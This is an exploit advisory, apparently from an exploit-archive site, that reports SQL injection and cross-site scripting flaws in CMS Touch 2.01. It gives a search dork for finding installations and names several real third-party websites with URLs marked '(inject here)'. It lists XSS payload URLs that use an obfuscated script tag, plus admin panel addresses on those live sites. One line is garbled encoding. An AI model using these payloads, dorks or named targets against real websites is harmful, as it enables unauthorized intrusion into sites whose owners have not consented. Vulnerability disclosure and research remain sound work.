CMS Touch 2.01 Cross Site Scripting / SQL Injection

Posted on 09 May 2014

cms touch V2.01 Sql Vulnerability
=================================
Author : indoushka
vendor : http://cmstouch.com
=================================
# Dork : powered by cmstouch
 ÙÂÂ†Ø¸Ø§ÙÂÂ… ØªØ§ØªØ´ ÙÂÂ„Ø¥Ø¯Ø§Ø±Ø© Ø§ÙÂÂ„ÙÂÂ…ÙÂÂˆØ§ÙÂÂ‚Ø¹ Ø§ÙÂÂ„Ø¥ÙÂÂ„ÙÂÂƒØªØ±ÙÂÂˆÙÂÂ†ÙÂÂŠØ© Ø§ÙÂÂ„ÙÂÂ†Ø³Ø®Ø© 2.01

http://alfarrajsite.com/cmstouch/pages.php?Page_ID=28 (inject here)

http://www.islamiccenter1.com/cmstouch/news.php?do=show&News_ID=18 (inject here)

http://www.ts.net.sa/cmstouch/news.php?do=show&News_ID=18 (inject here)

xss :

/cmstouch/news.php?do=show&News_ID=18'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>

/cmstouch/products.php?do=show&Products_ID=5'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>

Panel :

http://www.ts.net.sa/cmstouch//touchPanel/

http://cmstouch.com/touchPanel/

http://islamiccenter1.com/cmstouch/touchPanel/

TOP

Malware :

Last 20

Exploits :

Last 20